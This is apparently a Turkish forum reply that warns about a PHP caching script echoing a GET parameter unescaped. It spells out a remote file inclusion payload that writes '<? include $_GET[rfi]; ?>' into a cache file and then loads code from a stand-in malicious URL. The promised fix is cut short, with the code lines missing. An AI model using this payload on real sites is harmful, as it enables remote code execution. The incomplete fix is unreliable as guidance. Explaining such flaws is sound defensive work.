ÇOk güzel Teşekkür Ederim
Fakat Bazı Şeylere Dikkat Edilmesi gerekir Örnek Verecek Olursak
site/index.php?goster=123
Scriptin İçinde Herhangi bir Yerinde <? echo $_GET[goster]; ?> yazıyor İse
Saldırgan
site//index.php?goster=<? include $_GET[rfi]; ?>&rfi=
http://zararlidosya
yazdığında ilk Başta cache Klasorunde Dosya Oluşturur Ve içinde <? include $_GET[rfi]; ?> dosyası yazılır Saldırgan Url yi yeniden çağırırsa Yani tekrardan
site//index.php?goster=<? include $_GET[rfi]; ?>&rfi=
http://zararlidosyaYazarsa zararlı kodlar çalışacaktır
Peki Bunu Nasıl Zararsız hale getirebiliriz derseniz
Satırını
Olarak Değiştirin